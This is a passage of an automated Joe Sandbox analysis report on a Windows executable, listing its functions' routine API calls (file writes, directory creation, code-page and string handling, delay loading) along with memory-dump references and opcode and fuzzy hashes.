    • Instruction ID: 228dc7eb90e7593a853fab0c2d8e46533d5c1a8bed2fc64cee8ecc029368cfee
    • Opcode Fuzzy Hash: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
    • Instruction Fuzzy Hash: BC0147727112229BDB304B28AC44A5B77D9EF517A17110230FA0EE3161CB28D880CAE0
    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0004E79B,00000001,?,?,?,00000000,000566B2,?,?,?), ref: 0004B22E
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000566B2,?,?,?,?,?,00056174,?), ref: 0004B275
    • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0004E79B,00000001,?,?), ref: 0004B2A1
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
    • Instruction ID: bfe34fe0315550eaef4839c6ab563dabf81f1b12027db34f3c0d3bcd08e55124
    • Opcode Fuzzy Hash: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
    • Instruction Fuzzy Hash: A431E2B1248305AFEB14CF24D918BAE77E5FB81715F00052CF98567290CBB8ED48CBA6
    APIs
      • Part of subcall function 0004D68B: _wcslen.LIBCMT ref: 0004D691
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B569
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B59C
    • GetLastError.KERNEL32(?,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B5B9
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateDirectory$ErrorLast_wcslen
    • String ID:
    • API String ID: 2260680371-0
    • Opcode ID: a08ad618bd571e1ac11907e0095ecec52dbb8777b3bab07b4345ee302d82592e
    • Instruction ID: 7d7e85cfd0b6e4f8a37d76ce7b3d4fb9bbd551711640daf3aa03bf40a91192ab
    • Opcode Fuzzy Hash: a08ad618bd571e1ac11907e0095ecec52dbb8777b3bab07b4345ee302d82592e
    • Instruction Fuzzy Hash: 3E01D8F16046146AEF616B705C45BFEB29C9F05780F044435F901E6092DB68DA8187AD
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0006CA68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: 2d273ff484dfb011e25cb551966dcb8b37c083cbcc880bee102db87466103a9b
    • Instruction ID: 0013fab37b71955bfa2e199de3b1bf585eb04cf138433cf7a33fd3f2f7c56113
    • Opcode Fuzzy Hash: 2d273ff484dfb011e25cb551966dcb8b37c083cbcc880bee102db87466103a9b
    • Instruction Fuzzy Hash: 5741F67050428C9EEB228E64CC85EFABBEBEF55708F1404EDE5CA87142D335AE459F61
    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 0006C18D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: 8fd25538cc8f0d5c676c6a2cf8947ef76cad13c062877df8d389f472a44454c8
    • Instruction ID: acd62173cb10d84cae76bdbd4d584f9193bb068f3141edc0ff89489f4411cb6e
    • Opcode Fuzzy Hash: 8fd25538cc8f0d5c676c6a2cf8947ef76cad13c062877df8d389f472a44454c8
    • Instruction Fuzzy Hash: 7D014C32940108BBEF129F90DC05DEE3FA2EF09720F418115FF082A161CB368971EB95
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0006B71F), ref: 0006C105
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 70937e5fe6dcd3765d8838f4ce250952ed7bfe36e6d060333636c00d9daa9f37
    • Instruction ID: f2365e3c0c79b478e0ddae3342335bc30371c7d8115e669073787374f9c5d6f6
    • Opcode Fuzzy Hash: 70937e5fe6dcd3765d8838f4ce250952ed7bfe36e6d060333636c00d9daa9f37
    • Instruction Fuzzy Hash: 7DF0E931E81118BBEF219F50DC05CAE7FA2EF18750F408125FE096A161CF365D51DB85
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: 186d4af94a205b58a3aa705838249d929bbdd8941947c8e40c4963e6dd613a68
    • Instruction ID: bb483c77b6700d313302531409bc7ac6ee68f2b10e3582b6497a333c6600c26f
    • Opcode Fuzzy Hash: 186d4af94a205b58a3aa705838249d929bbdd8941947c8e40c4963e6dd613a68
    • Instruction Fuzzy Hash: 0BE05530F80218ABD7116B609C069BEBB92DF04B20F414126FA0CAA250CF391D818BDE
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 0565cac8c5ad6f077c80e69b309cbcf53d01269a724caff43406d7af7322c6e2
    • Instruction ID: 41471187254c8e049478870d5b6e77e78205cf5fdeeae7d48ac60f1e34190df6
    • Opcode Fuzzy Hash: 0565cac8c5ad6f077c80e69b309cbcf53d01269a724caff43406d7af7322c6e2
    • Instruction Fuzzy Hash: FFB01281268503BC32446254BC12E3F021CC7D1B13330C83BFC06C4442D84C0C491032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: bfd9a6a29423a712cb26397419bf8b9bf51e09d98fe358da0f447564e293fa45
    • Instruction ID: 293cf3fdeca7a34bfde793f74569076d9cc5cef35a5795179cb40dfe258b3498
    • Opcode Fuzzy Hash: bfd9a6a29423a712cb26397419bf8b9bf51e09d98fe358da0f447564e293fa45
    • Instruction Fuzzy Hash: 5DB01281368503BC32446254BD12E3B011CD7D0B13330883BF806C8441D88C0D491072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 23f30b74af2df463513391be679cb4b2adc42c9bdca60b6f859b58327a4ea8c2
    • Instruction ID: 89d84049307a8449f6294e0ed80d0f28d22e34b5915104f48f7e2b804e4098cd
    • Opcode Fuzzy Hash: 23f30b74af2df463513391be679cb4b2adc42c9bdca60b6f859b58327a4ea8c2
    • Instruction Fuzzy Hash: 6CB01281268503BC32446294BC12E3B011CD7D0B13330883BF806C4841D84C0C481032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 02fefe8571c8224e52ed51badb323015f8cf1face8a88595e852ddd082d8c6b7
    • Instruction ID: a1b2479682e2859081fed88a23bb0f78344c5b48132a14b9d11e99ca47ad223f
    • Opcode Fuzzy Hash: 02fefe8571c8224e52ed51badb323015f8cf1face8a88595e852ddd082d8c6b7
    • Instruction Fuzzy Hash: AAB012812686037C32946254BC02E3B011CC7D0B133308D3BF806C4441D84C0C881032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 65e74d11a948f2988848c601399dacfdfe018c3e095082d1656c7deafcaf7a68
    • Instruction ID: d340a24c2ee88dd37876ae62d18045cef2473f56e64d2c98f64d62347aa7211e
    • Opcode Fuzzy Hash: 65e74d11a948f2988848c601399dacfdfe018c3e095082d1656c7deafcaf7a68
    • Instruction Fuzzy Hash: A2B012822685037C32546254BC02E3F011CC7D1B13330C83BFC06C9446D84C0C4D1032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005FD5A
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: 3Ro
    • API String ID: 1269201914-1492261280
    • Opcode ID: bf00e87ed4bb2b8f1b09d815e4c99b8e6be42ae52bfb057c74950b1db4a638b3
    • Instruction ID: 80d910ef7e9c5f42f961f47c5856f322b79eca5336c63724f1b53dfee5dc1ff0
    • Opcode Fuzzy Hash: bf00e87ed4bb2b8f1b09d815e4c99b8e6be42ae52bfb057c74950b1db4a638b3
    • Instruction Fuzzy Hash: DAB012A12689037C330421506C02E3B023DDBC0B13330C63FFB03C4041944C0C4C1071
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 2ca2643cba812a04773a07a93b2204dc3970e6059c50cc46f61db94a62575d1b
    • Instruction ID: aa125f114f5c812f507e831b9ffc53d2ed97ad5ab489e145a4033c13e9dd3df7
    • Opcode Fuzzy Hash: 2ca2643cba812a04773a07a93b2204dc3970e6059c50cc46f61db94a62575d1b
    • Instruction Fuzzy Hash: 37A011822A82033C32082220BC02C3B022CCAE0B22330882BF802C8882AC880888203A
    APIs
      • Part of subcall function 0006C96B: GetOEMCP.KERNEL32(00000000,?,?,0006CBF4,?), ref: 0006C996
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0006CC39,?,00000000), ref: 0006CE14
    • GetCPInfo.KERNEL32(00000000,0006CC39,?,?,?,0006CC39,?,00000000), ref: 0006CE27
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: 141ca90bbc24dc8b0b4fb43af37d70a0c8cdd8688925d709dc786474640b1a04
    • Instruction ID: 852db4c40c5388ee7ba91b2c20583f56eb0ecc11dd77073cad0d4cac5a91256d
    • Opcode Fuzzy Hash: 141ca90bbc24dc8b0b4fb43af37d70a0c8cdd8688925d709dc786474640b1a04
    • Instruction Fuzzy Hash: 38510171E002459EFB209F75C885EBBBBF7AF41300F14456EE0D68B252D63A9A46CB90
    APIs
    • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,0004ACB0,?,?,00000000,?,?,00049C8B,?), ref: 0004AE3A
    • GetLastError.KERNEL32(?,?,00049C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0004AE49
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 5b90d5fe07633a583a5af12c51813a7ee93cfd79b0203e02a4a255892187b855
    • Instruction ID: ed4514fcdac03ba1c16885e1b674ca888640eccb3b36286f14333ee4126feaae
    • Opcode Fuzzy Hash: 5b90d5fe07633a583a5af12c51813a7ee93cfd79b0203e02a4a255892187b855
    • Instruction Fuzzy Hash: 3A4124F5F843459BDB34AE24C884AAE73E4FB4A312F100539E85783A51DB74DC858B5B
    APIs
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,0005A7F6,00000000,?), ref: 0005A699
    • SetWindowTextW.USER32(00000000,00000000), ref: 0005A6A3
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$ShowText
    • String ID:
    • API String ID: 1551406749-0
    • Opcode ID: c41f354ec79057fdcf8c9888ecae3000debab37314922567db0025acfc55d9ad
    • Instruction ID: c51508dc8fff80611abb0c739a2f6d1223c0e05f0725ab790e0623f441cc1f70
    • Opcode Fuzzy Hash: c41f354ec79057fdcf8c9888ecae3000debab37314922567db0025acfc55d9ad
    • Instruction Fuzzy Hash: ED31AC31700716AFDB00DF64DC84A2BBBE8BF49701B09021EFA0597261DF65AC56CFA2
    APIs
      • Part of subcall function 0006A505: GetLastError.KERNEL32(?,00083070,00065972,00083070,?,?,00065271,00000050,?,00083070,00000200), ref: 0006A509
      • Part of subcall function 0006A505: _free.LIBCMT ref: 0006A53C
      • Part of subcall function 0006A505: SetLastError.KERNEL32(00000000,?,00083070,00000200), ref: 0006A57D
      • Part of subcall function 0006A505: _abort.LIBCMT ref: 0006A583
      • Part of subcall function 0006CCFE: _abort.LIBCMT ref: 0006CD30
      • Part of subcall function 0006CCFE: _free.LIBCMT ref: 0006CD64
      • Part of subcall function 0006C96B: GetOEMCP.KERNEL32(00000000,?,?,0006CBF4,?), ref: 0006C996
    • _free.LIBCMT ref: 0006CC4F
    • _free.LIBCMT ref: 0006CC85
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID:
    • API String ID: 2991157371-0
    • Opcode ID: 06631647ce1b14c9c04ed7a333b0e6acdc53f72498e43b581f36377359ca288e
    • Instruction ID: e821c778b24be679c85544e77fd74cdd4928641ca0b2a500e99a962e6655a514
    • Opcode Fuzzy Hash: 06631647ce1b14c9c04ed7a333b0e6acdc53f72498e43b581f36377359ca288e
    • Instruction Fuzzy Hash: AD31A431904108AFEB54EFA9D845FBDB7F6EF41330F254099E4589B292EB369D40DB50
    APIs
